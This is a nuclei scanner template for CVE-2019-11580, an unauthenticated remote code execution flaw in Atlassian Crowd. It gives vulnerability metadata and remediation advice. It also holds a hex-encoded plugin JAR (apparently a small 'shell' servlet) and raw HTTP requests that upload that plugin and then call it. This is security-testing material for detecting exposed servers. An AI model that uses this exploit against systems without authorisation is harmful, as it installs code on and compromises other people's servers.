nuclei-templates/http/cves/2019/CVE-2019-11580.yaml

id: CVE-2019-11580

info:
  name: Atlassian Crowd and Crowd Data Center - Unauthenticated Remote Code Execution
  author: dwisiswant0
  severity: critical
  description: Atlassian Crowd and Crowd Data Center is susceptible to a remote code execution vulnerability because the pdkinstall development plugin is incorrectly enabled in release builds.    Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected system, leading to complete compromise of the system.    
  remediation: |
    Upgrade to Atlassian Crowd and Crowd Data Center version 3.4.3 or later to mitigate this vulnerability.    
  reference:
    - https://github.com/jas502n/CVE-2019-11580
    - https://jira.atlassian.com/browse/CWD-5388
    - https://nvd.nist.gov/vuln/detail/CVE-2019-11580
    - http://packetstormsecurity.com/files/163810/Atlassian-Crowd-pdkinstall-Remote-Code-Execution.html
    - https://github.com/Elsfa7-110/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-11580
    epss-score: 0.97441
    epss-percentile: 0.99946
    cpe: cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: atlassian
    product: crowd
    shodan-query:
      - http.component:"Atlassian Jira"
      - http.component:"atlassian jira"
  tags: cve,cve2019,packetstorm,kev,atlassian,rce,intrusive,unauth
variables:
  plugin: '{{hex_decode("504b0304140000000800033f2557544c2527eb0000000402000014001c0061746c61737369616e2d706c7567696e2e786d6c555409000316dff66410e4f66475780b000104e803000004e80300007d91416ec3201045d7ce29107b20c91a23e50039c4044f53140c16e0a8bd7d260527ae5595dd7c66febc0f1a8a879c1d0431f9f9ea02bbe177cf6d1ca51dbccc9fe8bdc4af89b30023f6fcb4b4b33304b862e2acce6571c7945d0c3d3f72669f5d7fd9981da3a3eb8c70e12356a5aa90606c8bde5c0314101643c124c87082e22e1eb9296946ad7e66561e03669bdc5488c46c61473269b85aad1bdfe32d8439c8bddc6bb594955afdc2de753a63ba7b2c0d99f2f9e80aaf4ff8aafe798beee93a272f2814c50b4691aed55aa93d6bd80bd8db106362505823caaa9128dab089d6e9e59290b5dafe37890f504b03040a0000000000033f255700000000000000000000000004001c00636f6d2f555409000316dff664bae3f66475780b000104e803000004e8030000504b03040a0000000000033f255700000000000000000000000008001c00636f6d2f63646c2f555409000316dff664bae3f66475780b000104e803000004e8030000504b03040a0000000000854225570000000000000000000000000e001c00636f6d2f63646c2f7368656c6c2f5554090003b9e4f664b9e4f66475780b000104e803000004e8030000504b0304140000000800bd422557a3de4c61670100004602000017001c00636f6d2f63646c2f7368656c6c2f6578702e636c617373555409000326e5f664b9e4f66475780b000104e803000004e80300008d51c94e0241107d25cb208c22e2bea05e0c18b1c1c4a8c17821b824440d183c237470cc3883330df25b5e347af003fc2863b5b870523be95a5ebfeaaa7efdfaf6fc02601bcb51849188611cc90826a298c4948169033384f09ee5586a9f1048676a8460d16d4a42bc6c39f2a4737329bdf3faa5cd48a8e91e4a45a8a4cbd7f56ebd277ce9756da9c495526d71c4a6da072af2b6237d55f893e6b75dc79705dd355aea35645b590c1898e5bcea76bc863cb074e788ecb537f465260c440ccc9998c70261b4582b653773f9dd6c3ebfb59333b06822852542a2e1de8846d316fe95b46dc1e584d4efd310929a202c571c9f7e0f4358fddf2308c32da92e3c4b498f309dce94bf6e3bf32ce7f3a030d064006669ef744098ec4b2becbad31255c59416ab831584f8f7f41a026909d80e73b6c89ed887d61e41f71cb06e6cc31fa0b631985ca2a969f601f6e6fa138608e38107047f2aa27c0ae6c5381ae128c8f828eff847cbb177504b03041400000008003a422557483e79dabf0000000f01000016001c00636f6d2f63646c2f7368656c6c2f6578702e6a617661555409000330e4f66430e4f66475780b000104e803000004e8030000558e416bc3300c85effe15a2a7642ca2290c36721c61eda9d0417bf61cd1787363d75293c0c87fafdbf5903d1008bdf73d14b4f9d14702e34f681a87dc92739552f6147c14f8d6bd1e9129f68e045b91804fd5dc44eb71b3ad474341acef12192e5fce1a304e33038d218d50d730ac13fdf9d704bf4a41d223db7bdb40e33f48b2596847e70bb140a4f333fcbb73f01d5332380769a31f18663fa472782825f0487288562866390eb7255bbcefeb62b52cdf8ab27c795d2ef2ea0e4c6a5257504b01021e03140000000800033f2557544c2527eb00000004020000140018000000000001000000fd810000000061746c61737369616e2d706c7567696e2e786d6c555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000033f2557000000000000000000000000040018000000000000001000fd4139010000636f6d2f555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000033f2557000000000000000000000000080018000000000000001000fd4177010000636f6d2f63646c2f555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000854225570000000000000000000000000e0018000000000000001000fd41b9010000636f6d2f63646c2f7368656c6c2f5554050003b9e4f66475780b000104e803000004e8030000504b01021e03140000000800bd422557a3de4c616701000046020000170018000000000000000000b48101020000636f6d2f63646c2f7368656c6c2f6578702e636c617373555405000326e5f66475780b000104e803000004e8030000504b01021e031400000008003a422557483e79dabf0000000f010000160018000000000001000000b481b9030000636f6d2f63646c2f7368656c6c2f6578702e6a617661555405000330e4f66475780b000104e803000004e8030000504b05060000000006000600ff010000c80400000000")}}'

http:
  - raw:
      - |
        POST /crowd/admin/uploadplugin.action HTTP/2
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Content-Type: multipart/mixed; boundary=----------------------------f15fe87e95a7
        Expect: 100-continue

        ------------------------------f15fe87e95a7
        Content-Disposition: form-data; name="file_cdl"; filename="rce.jar"
        Content-Type: application/octet-stream

        {{plugin}}
        ------------------------------f15fe87e95a7--        
      - |
        GET /crowd/plugins/servlet/exp HTTP/2
        Host: {{Hostname}}        

    matchers:
      - type: word
        part: body_2
        words:
          - "CVE-2019-11580"
# digest: 4a0a00473045022100f06581bfcfe0b17c53bbd30dd7b7ecd0a167ba619e328b7bee2e94703b40731802203f1e3b285d11fd171b61dfc5977b513cde6e6a75d8c3bc030cc403eec95b2da7:922c64590222798bb761d5b6d8e72950